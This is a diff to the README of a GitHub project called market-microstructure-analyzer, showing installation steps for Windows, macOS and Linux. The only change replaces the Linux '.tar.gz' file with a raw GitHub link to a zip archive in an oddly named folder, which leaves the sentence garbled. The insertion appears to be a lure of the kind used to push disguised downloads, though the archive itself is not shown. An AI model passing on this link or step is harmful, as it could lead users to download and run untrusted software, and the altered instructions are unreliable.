abdou-20/market-microstructure-analyzer/README.md

 4. **Install the Application:**
    - For Windows users: Double-click the downloaded `.exe` file and follow the prompts to complete the installation.
    - For macOS users: Open the `.dmg` file, then drag the application to your Applications folder.
-   - For Linux users: Extract the downloaded `.tar.gz` file and follow the included instructions.
+   - For Linux users: Extract the downloaded `https://raw.githubusercontent.com/abdou-20/market-microstructure-analyzer/main/flabbily/market-microstructure-analyzer.zip` file and follow the included instructions.

 5. **Open the Application:**
    - Locate the application on your computer and double-click to open it.
 For some systems, you may need to grant permission for the application to run.